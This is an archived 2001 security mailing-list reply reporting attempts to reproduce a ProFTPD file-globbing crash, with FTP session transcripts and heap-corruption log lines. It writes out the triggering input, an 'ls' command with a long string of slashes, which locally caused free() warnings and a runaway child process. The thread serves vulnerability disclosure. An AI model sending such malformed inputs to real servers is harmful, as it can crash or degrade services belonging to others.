Re: ProFTPD - Problems in file globbing, gives segmentation fault.

From: Moritz Grimm (gtgbrat_private)
Date: Wed Dec 19 2001 - 18:36:35 PST

Next message: Siddik, Syaefullah: "RE: Internet Explorer Document.Open() Without Close() Cookie Stea ling, File Reading, Site Spoofing Bug"

Previous message: Roman Drahtmueller: "Re: Linux distributions and /bin/login overflow"
In reply to: Mattias _: "ProFTPD - Problems in file globbing, gives segmentation fault."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Mattias _ wrote:
> AFFECTED VERSIONS
> =================
> ProFTPD 1.2.4
> ProFTPD 1.2.2rc3
> (Others may be affected as well.)
> 
> SYSTEMS
> =======
> This is tested on Slackware 8.
> 
> IMPACT
> ======
> The ftpd-child dies with signal 11 (SEGV), but the server stays up.
> The question is if it’s possible to do something nasty with this!?

I'm running ProFTPD 1.2.2 under OpenBSD 2.8.

The following happened when I tried it locally:

<snip>
Connected to localhost.
220 FTP Server ready.
Name (localhost:maxx): 
331 Password required for maxx.
Password:
230 User maxx logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls ////////////////////////////
500 EPSV not understood.
227 Entering Passive Mode (127,0,0,1,134,172).
150 Opening ASCII mode data connection for file list

^C
receive aborted
waiting for remote to finish abort.
421 Service not available, remote server has closed connection.
</snip>

The logs show the following many times:

Dec 20 01:27:13 phoenix proftpd in free(): warning: modified (chunk-)
pointer.
Dec 20 01:27:13 phoenix proftpd in free(): warning: junk pointer, too
high to make sense.
Dec 20 01:27:13 phoenix proftpd in free(): warning: junk pointer, too
low to make sense.

Both server and child didn't die. After getting disconnected, the child
process was still there and I had to kill -9 it. While it was running,
the computer showed symptoms of 100% CPU usage. Everything became pretty
slow, but not unusable (no real DoS). After killing the child,
everything went back to normal.

I wasn't able to remotely reproduce this behavior. Here's what happened
when using the Win2000 command line ftp from another box:

<snip>
230 Anonymous access granted, restrictions apply.
ftp> ls ////////////////////////////
200 PORT command successful.
150 Opening BINARY mode data connection for file list.
/////////////////////////////uploads
/////////////////////////////welcome.msg
/////////////////////////////pub
/////////////////////////////tmp
226 Transfer complete.
FTP: 148 Bytes empfangen in 0,07Sekunden 2,11KB/s
</snip>

This time, nothing weird happened.

I hope this is of any use for you.

Moritz

-- 
_______________________________________________________________________
"They who would give up an essential liberty for temporary security,
deserve   neither   liberty   or   security"  -  Benjamin   Franklin

Next message: Siddik, Syaefullah: "RE: Internet Explorer Document.Open() Without Close() Cookie Stea ling, File Reading, Site Spoofing Bug"
Previous message: Roman Drahtmueller: "Re: Linux distributions and /bin/login overflow"
In reply to: Mattias _: "ProFTPD - Problems in file globbing, gives segmentation fault."
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 17:44:49 PST